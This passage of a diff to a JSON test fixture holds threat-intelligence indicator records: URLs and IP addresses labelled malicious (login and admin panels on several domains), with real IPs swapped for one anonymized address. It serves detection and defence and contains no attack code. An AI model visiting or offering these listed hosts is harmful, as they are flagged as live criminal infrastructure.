"2020-02-02T02:00:11.839Z", "valid_from": "2020-02-02T02:00:11.839Z", @@ -14698,16 +14698,16 @@ "url": { "path": "/yvE9cDkW1l7pXwt5/login.php", "extension": "php", - "original": "http://5.188.60.203/yvE9cDkW1l7pXwt5/login.php", + "original": "http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php", "scheme": "http", - "domain": "5.188.60.203", - "full": "http://5.188.60.203/yvE9cDkW1l7pXwt5/login.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386436431Z", - "original": "{\"created\":\"2020-02-02T02:00:11.839Z\",\"description\":\"TS ID: 55280666629; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--f31af3ce-1dfe-4846-8f78-cc0f5e73dd2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:00:11.839Z\",\"name\":\"mal_url: http://5.188.60.203/yvE9cDkW1l7pXwt5/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.188.60.203/yvE9cDkW1l7pXwt5/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:11.839Z\"}", + "ingested": "2021-12-13T08:38:40.024258800Z", + "original": "{\"created\":\"2020-02-02T02:00:11.839Z\",\"description\":\"TS ID: 55280666629; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--f31af3ce-1dfe-4846-8f78-cc0f5e73dd2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:00:11.839Z\",\"name\":\"mal_url: http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:11.839Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14758,7 +14758,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386440729Z", + "ingested": "2021-12-13T08:38:40.024265900Z", "original": "{\"created\":\"2020-02-02T02:00:15.667Z\",\"description\":\"TS ID: 55280666662; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--f6bd5b3a-7b17-4b33-a487-1d47f9ffa62b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-02T02:00:15.667Z\",\"name\":\"mal_url: http://nortonlilly.info/boss/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/boss/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:15.667Z\"}", "category": "threat", "type": "indicator", @@ -14809,7 +14809,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386445117Z", + "ingested": "2021-12-13T08:38:40.024273Z", "original": "{\"created\":\"2020-02-02T02:00:31.866Z\",\"description\":\"TS ID: 55280666667; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--bc1481fa-a858-4a87-9ef6-8844ace2dbed\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-02T02:00:31.866Z\",\"name\":\"mal_url: http://ildar-mael-ru.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ildar-mael-ru.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:31.866Z\"}", "category": "threat", "type": "indicator", @@ -14861,7 +14861,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386449826Z", + "ingested": "2021-12-13T08:38:40.024280100Z", "original": "{\"created\":\"2020-02-02T02:00:31.895Z\",\"description\":\"TS ID: 55280666659; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--e441cd63-5660-465f-a299-b035d8276ff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-02T02:00:31.895Z\",\"name\":\"mal_url: http://butland.cf/sabali/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://butland.cf/sabali/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:31.895Z\"}", "category": "threat", "type": "indicator", @@ -14880,7 +14880,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 85.117.234.217", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55280666644; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-02-02T02:00:38.587Z", "valid_from": "2020-02-02T02:00:38.587Z", @@ -14902,12 +14902,12 @@ "first_seen": "2020-02-02T02:00:38.587Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "85.117.234.217" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386454054Z", - "original": "{\"created\":\"2020-02-02T02:00:38.587Z\",\"description\":\"TS ID: 55280666644; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--f83c3853-4de3-4139-8076-a598265f453c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-02T02:00:38.587Z\",\"name\":\"mal_ip: 85.117.234.217\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '85.117.234.217']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:38.587Z\"}", + "ingested": "2021-12-13T08:38:40.024287100Z", + "original": "{\"created\":\"2020-02-02T02:00:38.587Z\",\"description\":\"TS ID: 55280666644; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--f83c3853-4de3-4139-8076-a598265f453c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-02T02:00:38.587Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:38.587Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -14957,7 +14957,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386458382Z", + "ingested": "2021-12-13T08:38:40.024294100Z", "original": "{\"created\":\"2020-02-02T02:00:38.657Z\",\"description\":\"TS ID: 55280666595; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--374e400c-0db7-4e0d-b533-5b6653178da0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-02T02:00:38.657Z\",\"name\":\"mal_url: http://f0393257.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0393257.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:38.657Z\"}", "category": "threat", "type": "indicator", @@ -15009,7 +15009,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386462740Z", + "ingested": "2021-12-13T08:38:40.024301Z", "original": "{\"created\":\"2020-02-02T02:00:44.275Z\",\"description\":\"TS ID: 55280666609; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--6a115b32-72cb-4397-9550-28bd809ff522\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:00:44.275Z\",\"name\":\"mal_url: http://amotach-cn.com/DOTNETXXX/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://amotach-cn.com/DOTNETXXX/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:44.275Z\"}", "category": "threat", "type": "indicator", @@ -15028,7 +15028,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 46.17.175.204", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55280666694; iType: mal_ip; State: active; Org: Hostinger International Limited; Source: CyberCrime", "modified": "2020-02-02T02:01:03.981Z", "valid_from": "2020-02-02T02:01:03.981Z", @@ -15050,12 +15050,12 @@ "first_seen": "2020-02-02T02:01:03.981Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "46.17.175.204" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386467469Z", - "original": "{\"created\":\"2020-02-02T02:01:03.981Z\",\"description\":\"TS ID: 55280666694; iType: mal_ip; State: active; Org: Hostinger International Limited; Source: CyberCrime\",\"id\":\"indicator--7c6e0ed1-51a4-460c-a69a-75ce73db8961\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-02T02:01:03.981Z\",\"name\":\"mal_ip: 46.17.175.204\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '46.17.175.204']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:01:03.981Z\"}", + "ingested": "2021-12-13T08:38:40.024308200Z", + "original": "{\"created\":\"2020-02-02T02:01:03.981Z\",\"description\":\"TS ID: 55280666694; iType: mal_ip; State: active; Org: Hostinger International Limited; Source: CyberCrime\",\"id\":\"indicator--7c6e0ed1-51a4-460c-a69a-75ce73db8961\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-02T02:01:03.981Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:01:03.981Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15073,7 +15073,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 47.90.215.148", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55280666627; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime", "modified": "2020-02-02T02:01:09.238Z", "valid_from": "2020-02-02T02:01:09.238Z", @@ -15095,12 +15095,12 @@ "first_seen": "2020-02-02T02:01:09.238Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "47.90.215.148" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386471937Z", - "original": "{\"created\":\"2020-02-02T02:01:09.238Z\",\"description\":\"TS ID: 55280666627; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--c5225c57-2cfd-4cd4-873a-068d5577959e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:01:09.238Z\",\"name\":\"mal_ip: 47.90.215.148\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '47.90.215.148']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:01:09.238Z\"}", + "ingested": "2021-12-13T08:38:40.024315100Z", + "original": "{\"created\":\"2020-02-02T02:01:09.238Z\",\"description\":\"TS ID: 55280666627; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--c5225c57-2cfd-4cd4-873a-068d5577959e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:01:09.238Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:01:09.238Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15118,7 +15118,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 176.107.160.116", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55283402087; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime", "modified": "2020-02-03T01:56:22.888Z", "valid_from": "2020-02-03T01:56:22.888Z", @@ -15140,12 +15140,12 @@ "first_seen": "2020-02-03T01:56:22.888Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "176.107.160.116" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386476265Z", - "original": "{\"created\":\"2020-02-03T01:56:22.888Z\",\"description\":\"TS ID: 55283402087; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--30cc7535-c071-4164-89a2-f9fe308cbe2c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-03T01:56:22.888Z\",\"name\":\"mal_ip: 176.107.160.116\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '176.107.160.116']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:22.888Z\"}", + "ingested": "2021-12-13T08:38:40.024322Z", + "original": "{\"created\":\"2020-02-03T01:56:22.888Z\",\"description\":\"TS ID: 55283402087; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--30cc7535-c071-4164-89a2-f9fe308cbe2c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-03T01:56:22.888Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:22.888Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15195,7 +15195,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386481265Z", + "ingested": "2021-12-13T08:38:40.024329Z", "original": "{\"created\":\"2020-02-03T01:56:30.815Z\",\"description\":\"TS ID: 55283402093; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--16fe8840-e1d7-4e71-acd8-d727ed7baa09\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-03T01:56:30.815Z\",\"name\":\"mal_url: http://mine.kommanditgesel.icu/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mine.kommanditgesel.icu/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:30.815Z\"}", "category": "threat", "type": "indicator", @@ -15247,7 +15247,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386485623Z", + "ingested": "2021-12-13T08:38:40.024336Z", "original": "{\"created\":\"2020-02-03T01:56:31.691Z\",\"description\":\"TS ID: 55283402090; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--c091ca15-bd83-4318-b0f0-1c322baa7a7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-03T01:56:31.691Z\",\"name\":\"mal_url: http://soapstampingmachines.com/slider/data1/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://soapstampingmachines.com/slider/data1/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:31.691Z\"}", "category": "threat", "type": "indicator", @@ -15298,7 +15298,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386489831Z", + "ingested": "2021-12-13T08:38:40.024340Z", "original": "{\"created\":\"2020-02-03T01:56:34.945Z\",\"description\":\"TS ID: 55283402094; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--d68559f0-f20c-40bb-ab62-c2f80c83c80f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-03T01:56:34.945Z\",\"name\":\"mal_url: http://jino-stell-jino.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jino-stell-jino.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:56:34.945Z\"}", "category": "threat", "type": "indicator", @@ -15317,7 +15317,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.188.60.58/auth.php", + "name": "mal_url: http://89.160.20.156/auth.php", "description": "TS ID: 55283402104; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-03T01:57:32.610Z", "valid_from": "2020-02-03T01:57:32.61Z", @@ -15342,16 +15342,16 @@ "url": { "path": "/auth.php", "extension": "php", - "original": "http://5.188.60.58/auth.php", + "original": "http://89.160.20.156/auth.php", "scheme": "http", - "domain": "5.188.60.58", - "full": "http://5.188.60.58/auth.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/auth.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386494199Z", - "original": "{\"created\":\"2020-02-03T01:57:32.61Z\",\"description\":\"TS ID: 55283402104; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--ba8f8e26-04b9-460b-b1f4-cf0b2d85db94\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-03T01:57:32.61Z\",\"name\":\"mal_url: http://5.188.60.58/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.188.60.58/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:57:32.61Z\"}", + "ingested": "2021-12-13T08:38:40.024343400Z", + "original": "{\"created\":\"2020-02-03T01:57:32.61Z\",\"description\":\"TS ID: 55283402104; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--ba8f8e26-04b9-460b-b1f4-cf0b2d85db94\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-03T01:57:32.61Z\",\"name\":\"mal_url: http://89.160.20.156/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:57:32.61Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15369,7 +15369,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 92.63.197.191", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55283402092; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime", "modified": "2020-02-03T01:57:46.702Z", "valid_from": "2020-02-03T01:57:46.702Z", @@ -15391,12 +15391,12 @@ "first_seen": "2020-02-03T01:57:46.702Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "92.63.197.191" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386505090Z", - "original": "{\"created\":\"2020-02-03T01:57:46.702Z\",\"description\":\"TS ID: 55283402092; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--571838b6-5834-4cb9-a1eb-34f535483f4f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-03T01:57:46.702Z\",\"name\":\"mal_ip: 92.63.197.191\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '92.63.197.191']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:57:46.702Z\"}", + "ingested": "2021-12-13T08:38:40.024348300Z", + "original": "{\"created\":\"2020-02-03T01:57:46.702Z\",\"description\":\"TS ID: 55283402092; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--571838b6-5834-4cb9-a1eb-34f535483f4f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-03T01:57:46.702Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:57:46.702Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15447,7 +15447,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386511892Z", + "ingested": "2021-12-13T08:38:40.024353600Z", "original": "{\"created\":\"2020-02-03T01:58:15.744Z\",\"description\":\"TS ID: 55283402101; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime\",\"id\":\"indicator--336d902d-e5d8-48c1-87be-c4f506274d34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-03T01:58:15.744Z\",\"name\":\"mal_url: http://hypercleaner.su/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://hypercleaner.su/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:58:15.744Z\"}", "category": "threat", "type": "indicator", @@ -15499,7 +15499,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386517453Z", + "ingested": "2021-12-13T08:38:40.024359600Z", "original": "{\"created\":\"2020-02-03T01:58:28.73Z\",\"description\":\"TS ID: 55283402095; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--cae5efb7-ff91-4a8d-bf28-21ffff0e4994\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-03T01:58:28.73Z\",\"name\":\"mal_url: http://pnny.kommanditgesel.icu/news/plast/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pnny.kommanditgesel.icu/news/plast/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:58:28.73Z\"}", "category": "threat", "type": "indicator", @@ -15551,7 +15551,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386522372Z", + "ingested": "2021-12-13T08:38:40.024363400Z", "original": "{\"created\":\"2020-02-03T01:59:18.132Z\",\"description\":\"TS ID: 55283402096; iType: mal_url; State: active; Org: PT Master Web Network; Source: CyberCrime\",\"id\":\"indicator--1644ebf0-46d0-4dcc-8e04-3a58376cc625\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-02-03T01:59:18.132Z\",\"name\":\"mal_url: http://pa-buol.go.id/wp/panelnew/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pa-buol.go.id/wp/panelnew/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:18.132Z\"}", "category": "threat", "type": "indicator", @@ -15570,7 +15570,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.188.60.59/auth.php", + "name": "mal_url: http://89.160.20.156/auth.php", "description": "TS ID: 55283402103; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-03T01:59:28.343Z", "valid_from": "2020-02-03T01:59:28.343Z", @@ -15595,16 +15595,16 @@ "url": { "path": "/auth.php", "extension": "php", - "original": "http://5.188.60.59/auth.php", + "original": "http://89.160.20.156/auth.php", "scheme": "http", - "domain": "5.188.60.59", - "full": "http://5.188.60.59/auth.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/auth.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386527532Z", - "original": "{\"created\":\"2020-02-03T01:59:28.343Z\",\"description\":\"TS ID: 55283402103; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--a6588ee7-309e-49de-9884-faa2bdd702d2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-03T01:59:28.343Z\",\"name\":\"mal_url: http://5.188.60.59/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.188.60.59/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:28.343Z\"}", + "ingested": "2021-12-13T08:38:40.024368600Z", + "original": "{\"created\":\"2020-02-03T01:59:28.343Z\",\"description\":\"TS ID: 55283402103; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--a6588ee7-309e-49de-9884-faa2bdd702d2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-03T01:59:28.343Z\",\"name\":\"mal_url: http://89.160.20.156/auth.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/auth.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:28.343Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15655,7 +15655,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386532050Z", + "ingested": "2021-12-13T08:38:40.024373300Z", "original": "{\"created\":\"2020-02-03T01:59:33.587Z\",\"description\":\"TS ID: 55283402100; iType: mal_url; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--8d5e44f6-7283-40f8-b9b3-2c4791832c4e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-03T01:59:33.587Z\",\"name\":\"mal_url: http://anorelier.hk/fshblfn8071/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://anorelier.hk/fshblfn8071/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:33.587Z\"}", "category": "threat", "type": "indicator", @@ -15707,7 +15707,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386536569Z", + "ingested": "2021-12-13T08:38:40.024377500Z", "original": "{\"created\":\"2020-02-03T01:59:54.52Z\",\"description\":\"TS ID: 55283402099; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f33dd90a-b849-42af-9bcb-f60476358305\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-03T01:59:54.52Z\",\"name\":\"mal_url: http://bendetta.online/mangooste/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bendetta.online/mangooste/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-03T01:59:54.52Z\"}", "category": "threat", "type": "indicator", @@ -15759,7 +15759,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386540877Z", + "ingested": "2021-12-13T08:38:40.024385200Z", "original": "{\"created\":\"2020-02-03T01:59:54.544Z\",\"description\":\"TS ID: 55283402097; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime\",\"id\":\"indicator--27f2f598-95d6-4e35-a42e-240093d4452d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-03T01:59:54.544Z\",\"name\":\"mal_url: http://kayfundz.ru/kay/eng/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 